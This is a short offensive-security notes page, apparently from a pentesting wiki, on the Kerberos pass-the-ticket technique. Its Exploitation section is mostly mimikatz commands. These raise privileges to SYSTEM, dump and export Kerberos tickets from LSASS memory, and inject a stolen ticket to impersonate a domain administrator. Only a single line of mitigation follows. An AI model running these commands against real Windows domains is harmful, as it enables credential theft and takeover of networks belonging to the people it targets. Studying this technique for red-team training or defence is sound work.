Pass the Ticket

Overview

Use mimikatz to dump TGT from LSASS memory
Will give us .kirbi ticket which can be used to gain domain admin if ticket is from domain admin
Reuse old ticket to impersonate that ticket
Can also use base64-encoded tickets gathered with Rubeus
Look for Administrator tickets

Exploitation

# Start mimikatz and get SYSTEM
mimikatz.exe
privilege::debug
token::elevate

# Export all .kirbi tickets to current directory
sekurlsa::tickets /export

# PTT with mimikatz
kerberos::ptt <ticket>

# List cached tickets
klist

Mitigation:

Don't let domain admins log onto anything except the domain controller

PreviousTicket Harvesting NextPersistence

Last updated 2 years ago